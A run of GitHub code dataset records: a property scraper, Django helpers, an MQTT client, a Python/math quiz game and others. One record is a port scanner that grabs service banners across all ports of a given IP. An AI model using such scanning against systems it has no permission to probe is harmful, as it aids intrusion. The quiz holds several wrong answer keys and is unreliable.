soup.find_all(\"div\", \"propertyCard-details\"):\n\n link_html = prop_link.find(\"a\", href=True)\n link_value = link_html[\"href\"]\n # print(\"Using this link value: {}\".format(\n # link_value))\n if link_value == '':\n print(\"Link value is empty so I will break\")\n break\n property_link.append(\"rightmove.co.uk\"+link_value)\n\n key_val.append(link_value.split(\"/\")[2])\n\n print(\"key_val len: {} - property_list len : {} - property_address : {} - property_price : {} - property_link : {}\".format(\n len(key_val), len(property_list), len(property_address), len(property_price), len(property_link)))\n\n df = pd.DataFrame({\n \"Property_ID\": key_val,\n \"Name\": property_list,\n \"Address\": property_address,\n \"Price\": property_price,\n \"Link\": property_link,\n \"Extracted_Date\": date.today(),\n\n })\n if save_to_disk:\n df.to_csv(\"Properties\" +\n date.today().strftime(\"%Y%m%d\") + \".csv\", index=False)\n\n return df\n\n\ndef get_data(pull_from_api, save_to_disk, partial_data):\n if pull_from_api:\n print(\"I will try to extract from the API\")\n df = extract_from_api(save_to_disk, partial_data)\n else:\n print(\"I will just use the stored CSV\")\n df = pd.read_csv(\"Properties.csv\")\n\n return df\n\n\ndef connect_to_db():\n engine = sqlalchemy.create_engine(\n \"mssql+pyodbc://{USER}:{PWD}@{SRV}/{DB}?driver={DRIVER}\".format(\n USER=cfg.username, PWD=cfg.password, SRV=cfg.server, DB=cfg.database, DRIVER=cfg.driver), echo=False\n )\n\n df.to_sql(name='Properties', con=engine, schema='rms',\n if_exists='append', index=False)\n\n\ndf = get_data(pull_from_api=True, save_to_disk=False, partial_data=False)\n\nconnect_to_db()\nprint(\"Finished gathering data\")\n","repo_name":"wallyflops/rightmove-scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33959260724","text":"from django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom myxpense.models import UserProfile, ExpenseBook\n\n\ndef create_person(name, email):\n user = User.objects.create(username=name, email=email)\n UserProfile.objects.create(user=user, parent=user)\n return user\n\ndef update_person(person, name, email):\n person.username = name\n person.email = email\n person.save()\n\ndef delete_person(person):\n person.delete()\n\ndef get_people_related_to_person(user):\n expense_books = ExpenseBook.objects.filter(people=user)\n return User.objects.filter(\n Q(expensebook=expense_books) |\n Q(pk=user.id) |\n Q(userprofile__parent=user)\n ).distinct()\n","repo_name":"vivekchand/myxpense","sub_path":"myxpense/people_interactors.py","file_name":"people_interactors.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13106824531","text":"\nimport decimal\nimport time\n\nfrom decimal import Decimal\nfrom math import sqrt\n\ndef non_squared_generator(n):\n for n in range(2, n+1): \n if sqrt(n) % 1.0 != 0.0:\n yield n\n\nif __name__ == \"__main__\":\n\n # just to be sure\n decimal.getcontext().prec = 102\n\n t1 = time.clock()\n\n n = 0\n for a in non_squared_generator(99):\n sq = Decimal(a).sqrt()\n sm = sum(map(int, str(sq)[:101].split('.')[1]))\n n += sm + int(sqrt(a))\n #print(a, str(sq)[:101], sm + int(sqrt(a)))\n \n \n print(n)\n print(time.clock() - t1, \"seconds\")\n","repo_name":"Tyzeppelin/Project-Euler","sub_path":"problem80/problem80.py","file_name":"problem80.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27802447969","text":"#!/usr/bin/env python3\nimport itertools\nimport json\nimport os\nimport string\n\n\nclass Placker:\n def __init__(self, input_text, master_text, check_synonyms=True, min_len=3, save=False):\n self.save = save\n self.mutator_list = []\n self.master_list = []\n self.masterdict = {}\n self.inputdict = {}\n self.input_text = input_text\n self.master_text = master_text\n self.input_text = self.input_text.replace(\"- \", \"\")\n self.master_text = self.master_text.replace(\"- \", \"\")\n self.check_synonyms = check_synonyms\n self.min_len = min_len\n if check_synonyms:\n self.synonyms = json.load(open(os.path.dirname(os.path.abspath(__file__)) + '/support/src.json', 'r'))\n self.preprocess()\n # self.find_plagiarism()\n\n def preprocess(self):\n preprocessor = str.maketrans(string.ascii_uppercase, string.ascii_lowercase, string.punctuation)\n self.unprocessed_input_list = self.input_text.translate(str.maketrans(\"\", \"\", string.punctuation)).split()\n self.input_list = self.input_text.translate(preprocessor).split()\n self.word_plags = [0]*len(self.unprocessed_input_list)\n self.mlist = self.master_text.translate(preprocessor).split()\n for k in range(len(self.mlist) - self.min_len + 1):\n self.masterdict[tuple(self.mlist[k:self.min_len + k])] = 1\n\n def find_synonym(self,i):\n self.mutator_list = []\n for pos, word in enumerate(self.check_str):\n if word in list(self.synonyms.keys()):\n temp_syns = []\n for key, value in list(self.synonyms[word].items()):\n temp_syns += value\n self.mutator_list.append(list(set(temp_syns)))\n else:\n self.mutator_list.append([word])\n\n # iterate all possible combos \n self.master_list = list(itertools.product(*self.mutator_list))\n\n for some_list in self.master_list:\n # check for plagiarism\n if self.masterdict.get(tuple(some_list), None):\n for index in range(i, self.min_len + i):\n self.word_plags[index] = 1\n\n def find_plagiarism(self):\n for i, j in enumerate(self.input_list):\n self.master_list = []\n self.check_str = self.input_list[i:self.min_len + i]\n if len(self.check_str) < self.min_len:\n continue\n if self.check_str not in self.master_list:\n self.master_list.append(self.check_str)\n\n if self.check_synonyms is True:\n self.find_synonym(i)\n else:\n if self.masterdict.get(tuple(self.check_str), None):\n for index in range(i, self.min_len + i):\n self.word_plags[index] = 1\n\n for i, word_plag in enumerate(self.word_plags):\n if word_plag == 1:\n self.unprocessed_input_list[i] = \"<span style=\\\"color:red\\\">{}</span>\".format(self.unprocessed_input_list[i])\n\n plag_text = \" \".join(self.unprocessed_input_list)\n if self.save:\n with open(\"out.md\", \"w\") as f:\n f.write(plag_text)\n else:\n return plag_text\n\nif __name__ == \"__main__\":\n save = False\n # quick = Placker(open(sys.argv[1], 'r').read(), open(sys.argv[2], 'r').read(), sys.argv[3], int(sys.argv[4]))\n quick = Placker(\"Quickly check and visualise plagiarism between two documents.\", \"Quickly stop and visualise plagiarism between two documents.\", True, 3)\n print(quick.find_plagiarism())\n","repo_name":"MandarGogate/Plaker","sub_path":"placker.py","file_name":"placker.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31904342778","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n\nimport socket\n\nip = input(\"Digite o IP: \")\n\nprint(\"Porta Serviço\")\nfor port in range(1, 65535):\n\tmysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tif(mysocket.connect_ex((ip, port)) == 0):\n\t\tbanner = mysocket.recv(1024)\n\t\tprint (port, \" \", banner)\n\tmysocket.close()\n","repo_name":"vncscampos/haks","sub_path":"scan/banner_grabbing.py","file_name":"banner_grabbing.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10164470287","text":"from asapdiscovery.data.dask_utils import LilacDaskCluster, LilacGPUDaskCluster\n\n\ndef test_LilacDaskCluster():\n opts = LilacDaskCluster()\n cluster = opts.to_cluster()\n js = cluster.job_script()\n assert \"dask-worker\" in js\n\n\ndef test_LilacGPUDDaskCluster():\n opts = LilacGPUDaskCluster()\n cluster = opts.to_cluster()\n js = cluster.job_script()\n assert \"dask-worker\" in js\n assert \"gpuqueue\" in js\n\n\ndef test_LilacGPUDaskCluster_from_gpu():\n opts = LilacGPUDaskCluster.from_gpu(\"GTX1080TI\")\n cluster = opts.to_cluster()\n js = cluster.job_script()\n assert \"dask-worker\" in js\n assert \"gpuqueue\" in js\n assert \"lt-gpu\" in js\n assert '-R \"select[hname!=lt16]\"' in js\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-data/asapdiscovery/data/tests/test_dask_utils.py","file_name":"test_dask_utils.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"42583258213","text":"#!/usr/bin/env python3\n\nfrom paho.mqtt.client import MQTTv311\nimport paho.mqtt.client as mqtt\nimport time\n\nMQTT_ID = \"mqtt_master\"\nMQTT_QUEUE_REQUEST = \"/topic/request\"\nMQTT_QUEUE_RESPONSE = \"/topic/response\"\n\n \ndef on_connect(client, userdata, flags, rc):\n\tprint(\"Subscribe: {}\".format(MQTT_QUEUE_RESPONSE))\n\tclient.subscribe(topic=MQTT_QUEUE_RESPONSE)\n \n\ndef on_message(client, userdata, message):\n\tmsg = message.payload.decode(\"UTF-8\")\n\tprint(\"Payload: {}\".format(msg))\n\n\ndef on_publisher(client):\n\tcount = 1\n\twhile True:\n\t\ttime.sleep(5)\n\t\tprint(\"-------------------------\")\n\t\tprint(\"Sending test message {}...\".format(count))\n\t\tclient.publish(MQTT_QUEUE_REQUEST, \"MESSAGE {}\".format(count))\n\t\tcount +=1\n\n \ndef main():\n\tclient = mqtt.Client(client_id=MQTT_ID, clean_session=True, userdata=None, protocol=MQTTv311, transport=\"tcp\")\n\tclient.on_connect = on_connect\n\tclient.on_message = on_message\n\tclient.connect(\"127.0.0.1\", 1883, 60)\n\tclient.loop_start()\n\ton_publisher(client)\n\n \nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"gustavorv86/pyMQTT","sub_path":"mqtt_master.py","file_name":"mqtt_master.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44593481698","text":"from time import *\r\nimport threading\r\nimport time\r\nimport random\r\nimport string\r\nimport tic_tok\r\nimport math\r\nprint(\"\"\"You have 10 minute for 10 Question\r\nNote:Time running in background \"\"\")\r\ndef quiz_timer():\r\n global my_timer\r\n my_timer=600\r\n for x in range(600):\r\n my_timer+=-1\r\n sleep(1)\r\nt_p_score=0 \r\ndef Python_Question():\r\n global t_p_score\r\n p_score=0\r\n total_time=time.time()\r\n quiz_timer_thread=threading.Thread(target=quiz_timer)\r\n quiz_timer_thread.start()\r\n print(\"Time Start Now\")\r\n\r\n while my_timer>0:\r\n \r\n Q1_list=[\"Q1.for x in range(0.5, 5.5, 0.5): print(x)?\\n (1)[0.5, 1, 1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5, 5.5]\\n (2)[0.5, 1, 1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5]\\n (3)The Program executed with errors\"\r\n ,\"Q1.var =\"'\"James\"'\" * 2 * 3 then print(var)? \\n (1)JamesJamesJamesJamesJames\\n (2)Error: invalid syntax\\n (3)JamesJamesJamesJamesJamesJames\"]\r\n\r\n Q1=random.choice(Q1_list)\r\n print(Q1)\r\n ans1_index=Q1_list.index(Q1)\r\n A1_list=[\"The Program executed with errors\",\"JamesJamesJamesJamesJamesJames\"]\r\n ans1=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans1==A1_list[ans1_index] or ans1==\"3\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n\r\n Q2_list=[\"Q2.Which operator has higher precedence in the following list?\\n (1)% Modulus\\n (2)**, Exponent\\n (3)& BitWise AND\\n (4)> Comparison\"\r\n ,\"Q2.var= \"'\"James Bond\"'\" then print(var[2::-1])? \\n (1)py\\n(2)yn\\n (3)pyn\\n (4)yna\"]\r\n\r\n Q2=random.choice(Q2_list)\r\n print(Q2)\r\n ans2_index=Q2_list.index(Q2)\r\n A2_list=[\"**, Exponent\",\"yn\"]\r\n ans2=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans2==A2_list[ans2_index] or ans2==\"2\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q3_list=[\"Q3.l = [None] * 10 then print(len(l))\\n (1)10\\n (2)0\\n (3)Syntax Error\"\r\n ,\"Q3.my_list = [\"'\"Hello\"'\", \"'\"Python\"'\" then print(\"'\"-\"'\".join(my_list))? \\n (1)Hello-Python\\n (2) HelloPython-\\n (3)-HelloPython\"]\r\n\r\n Q3=random.choice(Q3_list)\r\n print(Q3)\r\n ans3_index=Q3_list.index(Q3)\r\n A3_list=[\"10\",\"Hello-Python\"]\r\n ans3=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans3==A3_list[ans3_index] or ans3==\"1\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n\r\n Q4_list=[\"Q4.Which one is NOT a legal variable name?\\n (1) my-var \\n (2) my_var\\n (3)my_var \\n (4) _myvar\"\r\n ,\"\"\"Q4.How do you insert COMMENTS in Python code?\\n (1) #This is a comment \\n (2) //This is a comment\\n (3) /This is a comment/\\n (4)None of above\"\"\",\r\n \"Q4.How do you create a variable with the numeric value 5?\\n (1) Both the other answers are correct \\n (2) x = 5 \\n (3) x = int(5)\"\r\n ,\"Q4.What is the correct file extension for Python files?\\n (1).py \\n (2).pt\\n (3).pyt\\n (4).pyth\"]\r\n\r\n Q4=random.choice(Q4_list)\r\n print(Q4)\r\n ans4_index=Q4_list.index(Q4)\r\n A4_list=[\"my-var\",\"#This is a comment\",\"Both the other answers are correct\",\".py\"]\r\n ans4=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ans4==A4_list[ans4_index] or ans4==\"1\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n\r\n if my_timer==0:\r\n break\r\n\r\n Q5_list=[\"Q5.How do you create a variable with the floating number 2.8?\\n (1)x = float(2.8)\\n (2)Both the other answers are correct\\n (3)x = 2.8\"\r\n ,\"Q5.What is the correct syntax to output the type of a variable or object in Python?\\n (1)print(typeof x) \\n (2)print(type(x))\\n (3)print(typeOf(x)) \\n (4)print(typeof(x))\"\r\n ,\"Q5.What is the correct way to create a function in Python?\\n(1)create myFunction(): \\n (2)def myFunction():\\n (3)function myfunction():\"\r\n ,\"Q5.Which method can be used to remove any whitespace from both the beginning and the end of a string?\\n (1)len()\\n (2)strip() \\n (3)ptrim()\\n (4)trim()\"]\r\n\r\n Q5=random.choice(Q5_list)\r\n print(Q5)\r\n ans5_index=Q5_list.index(Q5)\r\n A5_list=[\"Both the other answers are correct\",\"print(type(x))\",\"def myFunction():\",\"strip()\"]\r\n ans5=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ans5==A5_list[ans5_index] or ans5==\"2\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q6_list=[\"Q6.Which method can be used to return a string in upper case letters?\\n (1)upperCase()\\n (2)uppercase()\\n (3)toUpperCase()\\n (4)upper()\"\r\n ,\"Q6.Which method can be used to replace parts of a string?\\n (1)switch()\\n (2)replaceString()\\n (3)repl()\\n (4)replace()\"\r\n ,\"Q6.Which operator is used to multiply numbers?\\n (1)#\\n (2)X\\n (3)%\\n (4)*\"\r\n ,\"Q6.Which operator can be used to compare two values?\\n (1)!=\\n (2)==\\n (3)><\\n (4)=\"]\r\n\r\n Q6=random.choice(Q6_list)\r\n print(Q6)\r\n ans6_index=Q6_list.index(Q6)\r\n A6_list=[\"upper()\",\"replace()\",\"*\",\"=\"]\r\n ans6=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ans6==A6_list[ans6_index] or ans6==\"4\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q7_list=[\"Q7.Which collection is ordered, changeable, and allows duplicate members?\\n (1)DICTIONARY\\n (2)TUPLE\\n (3)LIST \\n (4)SET\"\r\n ,\"Q7.Which collection does not allow duplicate members?\\n (1)TUPLE\\n (2)LIST\\n (3)SET\\n (4)Non of the above\"\r\n ,\"Q7.How do you start writing an if statement in Python?\\n (1)if x > y then: \\n (2)if (x > y)\\n (3)if x > y:\"]\r\n\r\n Q7=random.choice(Q7_list)\r\n print(Q7)\r\n ans7_index=Q7_list.index(Q7)\r\n A7_list=[\"LIST\",\"SET\",\"if x > y:\"]\r\n ans7=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ans7==A7_list[ans7_index] or ans7==\"3\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n Q8_list=[\"Q8.How do you start writing a while loop in Python?\\n (1)while x > y:\\n (2)while x > y {\\n (3)x > y while {\\n (4)while (x > y)\"\r\n ,\"Q8.How do you start writing a for loop in Python?\\n (1)for x in y:\\n (2)for each x in y:\\n (3)for x in y:\"\r\n ,\"Q8.Which statement is used to stop a loop?\\n (1)break\\n (2)stop\\n (3)return\\n (4)exit\"]\r\n\r\n Q8=random.choice(Q8_list)\r\n print(Q8)\r\n ans8_index=Q8_list.index(Q8)\r\n A8_list=[\"while x > y:\",\"for x in y:\",\"break\"]\r\n ans8=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans8==A8_list[ans8_index] or ans8==\"1\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q9_list=[\"Q9.What is the output for −- 'you are doing well' [2:999]\\n (1)' '\\n (2)Index error\\n (3)'you are doing well'\\n (4)'u are doing well'\"\r\n ,\"\"\"Q9.y = [4, 5,1j] then y.sort()?\\n (1)[1j,4,5]\\n (2)[5,4,1j]\\n (3)[4,5,1j]\\n (4)Type Error\"\"\"\r\n ,\"\"\"Q9.Suppose we are given with two sets(s1&s2) then what is the output of the code −\r\ns1 + s2\\n (1)Adds the elements of the both the sets.\\n (2)Removes the repeating elements and adds both the sets.\\n (3)Output will be stored in S1.\\n (4)It is an illegal command.\"\"\"]\r\n\r\n Q9=random.choice(Q9_list)\r\n print(Q9)\r\n ans9_index=Q9_list.index(Q9)\r\n A9_list=[\"'u are doing well'\",\"Type Error\",\"It is an illegal command.\"]\r\n ans9=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans9==A9_list[ans9_index] or ans9==\"4\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q10_list=[\"Q10.x = 36 / 4 * (3 + 2) * 4 + 2 then print(x)?\\n (1)182\\n (2)37\\n (3)117\\n (4)The Program executed with errors\"\r\n ,\"Q10.p, q, r = 10, 20 ,30 then print(p, q, r)? \\n (1)10 20 30\\n (2)10 20\\n (3)Error: invalid syntax\"]\r\n\r\n Q10=random.choice(Q10_list)\r\n print(Q10)\r\n ans10_index=Q10_list.index(Q10)\r\n A10_list=[\"182\",\"10 20 30\"]\r\n ans10=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans10==A10_list[ans10_index] or ans10==\"1\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n break\r\n sleep(1)\r\n print(\"Time Up\")\r\n print(\"Score:{}\".format(p_score))\r\n t_p_score=p_score\r\n if p_score==10:\r\n total_secound=time.time()-total_time\r\n minutes=total_secound//60\r\n second=total_secound%60\r\n \r\n if minutes==0 and second<=59:\r\n print(\"Congratulation you have done 10 Question in %.2f seconds\"%second)\r\n else:\r\n print(\"Congratulation you have done 10 Question in %d minutes %.2f seconds\"%(minutes,second)) \r\n \r\n \r\nt_m_score=0 \r\ndef math_Question():\r\n global t_m_score\r\n score=0\r\n total_time=time.time()\r\n quiz_timer_thread=threading.Thread(target=quiz_timer)\r\n quiz_timer_thread.start()\r\n print(\"Time Start Now\")\r\n\r\n while my_timer>0:\r\n Q1a=random.randint(1,10)\r\n Q1b=random.randint(1,10)\r\n ans1=Q1a+Q1b\r\n print(\"Q1.A={} and B={} C=a+b then C?\\n \".format(Q1a,Q1b),end=\"\")\r\n print(\"1.{}\".format(random.randint(1,100))+\"\\t2.{}\".format(random.randint(1,100))\r\n +\"\\n 3.{}\".format(ans1)+\"\\t4.{}\".format(random.randint(1,100)))\r\n ANS1=input(\" ANS:\")\r\n \r\n if my_timer==0 :\r\n break\r\n elif ANS1==str(ans1) or ANS1==\"3\":\r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n\r\n print()\r\n if my_timer==0:\r\n break\r\n Q1a=random.randint(1,10)\r\n Q1b=random.randint(1,10)\r\n option1=random.randint(1,100) \r\n option2=random.randint(1,100)\r\n option3=random.randint(1,100)\r\n ans2=Q1a*Q1b\r\n print(\"Q2.A={} and B={} C=A*B then C=?\\n\".format(Q1a,Q1b),end=\"\")\r\n print(\" 1.{}\\t2.{}\\n 3.{}\\t4.{}\".format(option1,ans2,option3,option2))\r\n ANS2=input(\" ANS:\")\r\n \r\n if my_timer==0:\r\n break\r\n elif ANS2==str(ans2) or ANS2==\"2\": \r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n print()\r\n \r\n if my_timer==0:\r\n break\r\n\r\n Q3a=random.randint(1,100)\r\n Q3b=random.randint(1,10)\r\n Q3c=random.randint(1,10)\r\n Q3d=random.randint(1,100)\r\n\r\n option1=round(random.uniform(1,100),2)\r\n option2=round(random.uniform(1,100),2)\r\n option3=round(random.uniform(1,100),2)\r\n ans3=round(Q3a/(Q3b/Q3c)+Q3d,2)\r\n print(\"Q3.Divide {} by {}/{} and add {}. What is the answer?\\n\".format(Q3a,Q3b,Q3c,Q3d),end=\"\")\r\n print(\" (1){}\\t(2){}\\n (3){}\\t(4){}\".format(option1,option3,option2,ans3))\r\n ANS3=input(\" ANS:\")\r\n \r\n if my_timer==0:\r\n break\r\n elif ANS3==str(ans3) or ANS3==\"4\": \r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n print()\r\n \r\n if my_timer==0:\r\n break\r\n \r\n Q4a=random.randint(1,100)\r\n Q4b=random.randint(1,5)\r\n Q4c=random.randint(1,5)\r\n\r\n option1=round(random.uniform(1,312500),2)\r\n option2=round(random.uniform(1,312500),2)\r\n option3=round(random.uniform(1,312500),2)\r\n ans4=round(Q4a*(Q4b**Q4c))\r\n print(\"Q4.({}*{}**{})=?\\n\".format(Q4a,Q4b,Q4c))\r\n print(\" (1){}\\t(2){}\\n (3){}\\t(4){}\".format(option1,option3,option2,ans4))\r\n ANS4=input(\" ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ANS4==str(ans4) or ANS4==\"4\": \r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n print()\r\n \r\n if my_timer==0:\r\n break\r\n \r\n\r\n Q5a=random.randint(1,20000)\r\n Q5b=random.randint(1,20000)\r\n Q5c=random.randint(1,20000)\r\n\r\n ans5=Q5c+Q5a+Q5b\r\n option1=ans5+random.randint(1,1000)\r\n option2=ans5+random.randint(1,1000)\r\n option3=ans5+random.randint(1,1000)\r\n print(\"Q5.(?)-{}-{}={}\\n\".format(Q5a,Q5b,Q5c))\r\n print(\" (1){}\\t(2){}\\n (3){}\\t(4){}\".format(ans5,option1,option2,option3))\r\n ANS4=input(\" ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ANS4==str(ans4) or ANS4==\"1\": \r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n print()\r\n \r\n if my_timer==0:\r\n break\r\n Q6_list=[\"Q6What is the symbol of pi?\\n(1)π\\n(2)€\\n(3)Ω\\n(4)∞\"\r\n ,\"Q6.Arrange the numbers in ascending order: 36, 12, 29, 21, 7? \\n(1)7, 12, 21, 29, 36\\n(2)36, 29, 21, 12, 7\\n(3)36, 29, 7, 21, 12\\n(4)None of these\"\r\n ,\"Q6.20 is divisible by ……… .\\n(1)1\\n(2)3\\n(3)7\\n(4)None of these\"]\r\n\r\n Q6=random.choice(Q6_list)\r\n print(Q6)\r\n ans6_index=Q6_list.index(Q6)\r\n A6_list=[\"π\",\"7, 12, 21, 29, 36\",\"1\"]\r\n ans6=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans6==A6_list[ans6_index] or ans6==\"1\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q7_list=[\"Q7.What is the smallest three digit number?\\n(1)101\\n(2)999\\n(3)111\\n(4)100\"\r\n ,\"Q7.What is three fifth of 100?\\n(1)3\\n(2)5\\n(3)20\\n(4)60\"\r\n ,\"Q7.What is the remainder of 21 divided by 7?\\n(1)21\\n(2)7\\n(3)1\\n(4)None of these\"]\r\n\r\n Q7=random.choice(Q7_list)\r\n print(Q7)\r\n ans7_index=Q7_list.index(Q7)\r\n A7_list=[\"100\",\"60\",\"None of these\"]\r\n ans7=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans7==A7_list[ans7_index] or ans7==\"4\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n Q8_list=[\"Q8.What is 7% equal to?\\n(1)0.007\\n(2)0.7\\n(3)0.07\\n(4)7\"\r\n ,\"Q8.What is the value of x if x2 = 169?\\n(1)1\\n(2)169\\n(3)13\\n(4)338\"\r\n ,\"Q8.What is the reciprocal of 17/15?\\n(1)1.13\\n(2)17/15\\n(3)15/17\\n(4)30/34\"]\r\n\r\n Q8=random.choice(Q8_list)\r\n print(Q8)\r\n ans8_index=Q8_list.index(Q8)\r\n A8_list=[\"0.07\",\"13\",\"15/17\"]\r\n ans8=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans8==A8_list[ans8_index] or ans8==\"3\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q9_list=[\"Q9.Which number is missing? 1, 9, 25, 49, (?)\\n(1)121\\n(2)81\\n(3)16\\n(4)169\"\r\n ,\"Q9.From the alternatives, select the set which is most alike the set (23, 29, 31).\\n(1) (17, 21, 29)\\n(2) (41, 43, 47)\\n(3) (31, 37, 49)\\n(4) (13, 15, 23)\"\r\n ,\"Q9.What is 121 times 11?\\n(1)1313\\n(2)1331\\n(3)1133\\n(4)3131\"]\r\n\r\n Q9=random.choice(Q9_list)\r\n print(Q9)\r\n ans9_index=Q9_list.index(Q9)\r\n A9_list=[\"81\",\"(41, 43, 47)\",\"1331\"]\r\n ans9=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans9==A9_list[ans9_index] or ans9==\"2\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n \r\n Q10_list=[\"Q10.3456 ÷ 12 ÷ 8 = ?\\n(1)33.5\\n(2)36.5\\n(3)50\\n(4)36\"\r\n ,\"Q10. 106 × 106 – 94 × 94 = ?\\n(1)2004\\n(2)1904\\n(3)1906\\n(4)2400\"\r\n ,\"Q10.10-2 means …………. .\\n(1)milli\\n(2)micro\\n(3)deci\\n(4)centi\"]\r\n\r\n Q10=random.choice(Q10_list)\r\n print(Q10)\r\n ans10_index=Q10_list.index(Q10)\r\n A10_list=[\"36\",\"2400\",\"1331\"]\r\n ans10=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans10==A10_list[ans10_index] or ans10==\"4\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n break\r\n sleep(1)\r\n \r\n print(\"Time Up\")\r\n print(\"Score:{}\".format(score))\r\n t_m_score=score\r\n if score==10:\r\n total_secound=time.time()-total_time\r\n minutes=total_secound//60\r\n second=total_secound%60\r\n\r\n if minutes==0 and second<=59:\r\n print(\"Congratulation you have done 10 Question in %.2f seconds\"%second)\r\n else:\r\n print(\"Congratulation you have done 10 Question in %d minutes %.2f seconds\"%(minutes,second)) \r\n\r\n\r\n \r\n\r\n\r\nwhile True:\r\n print(\"\"\"----------------------------------\r\n- Quiz With Game -\r\n- -\r\n- 1.Python Quiz - \r\n- 2.Math Quiz -\r\n- 3.Tic-Tok game -\r\n- 4.Exit -\r\n- - \r\n----------------------------------\"\"\")\r\n try:\r\n ch=input(\"Enter your choice:\")\r\n except Exception as e:\r\n print(\"Enter right input!\")\r\n if ch==\"1\":\r\n Python_Question()\r\n elif ch==\"2\":\r\n math_Question()\r\n elif ch==\"3\":\r\n if t_p_score>=1 and t_m_score>=1:\r\n tic_tok.Tik_tac()\r\n else:\r\n print(\"\"\"Your score is low!!\\nIF u got 6/10 in python and 6/10 in math then u able to play game!\"\"\")\r\n\r\n elif ch==\"4\":\r\n break\r\n else:\r\n print(\"Enter right input between 1 to 4 only!\")\r\n \r\n","repo_name":"jitendra10061997/Python-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17629395202","text":"import telebot\n\nimport schedule\nimport threading\nimport helper\n\nfrom threading import Thread\nfrom time import sleep\nfrom abc import ABC, abstractmethod\n\nfrom telebot import types\n\nfrom typing import Dict, 